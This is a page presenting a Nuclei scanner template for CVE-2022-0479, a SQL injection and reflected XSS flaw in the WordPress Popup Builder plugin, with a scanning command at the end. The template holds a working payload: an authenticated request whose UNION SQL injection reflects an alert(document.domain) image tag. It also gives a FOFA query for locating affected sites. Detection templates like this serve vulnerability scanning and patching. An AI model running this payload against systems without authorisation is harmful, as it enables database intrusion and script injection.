Skip to content

Popup Builder Plugin - SQL Injection and Cross-Site Scripting

ID: CVE-2022-0479

Severity: critical

Author: ritikchaddha

Tags: cve,cve2022,wp,wp-plugin,wordpress,popup-builder,xss,sqli,authenticated

The Popup Builder WordPress plugin before 4.1.1 is vulnerable to SQL Injection and Reflected XSS via the sgpb-subscription-popup-id parameter.

id: CVE-2022-0479
info:
name: Popup Builder Plugin - SQL Injection and Cross-Site Scripting
author: ritikchaddha
severity: critical
description: |
The Popup Builder WordPress plugin before 4.1.1 is vulnerable to SQL Injection and Reflected XSS via the sgpb-subscription-popup-id parameter.
impact: |
Allows attackers to execute malicious SQL queries and inject scripts into web pages
remediation: |
Update Popup Builder Plugin to the latest secure version
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0479
cwe-id: CWE-89
epss-score: 0.0017
epss-percentile: 0.53299
cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: sygnoos
product: popup_builder
framework: wordpress
fofa-query: body="/wp-content/plugins/popup-builder"
tags: cve,cve2022,wp,wp-plugin,wordpress,popup-builder,xss,sqli,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "/wp-content/plugins/popup-builder")'
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscription-popup-id=0%29+union+all++select+1%2C0x3c696d6720737263206f6e6572726f723d616c65727428646f63756d656e742e646f6d61696e293e%2C3%2C4%2C5%2C6+--+g HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=onerror=alert(document.domain)></td><td>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100b27cd34f69bd310856542af1a25eafff3be6c086973b0d67569af9749277ff8d022100c3f39f972679167a5fb5829edf113283a7bc2580883dffdb32c5f5e5fa1dc776:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0479.yaml"

View on Github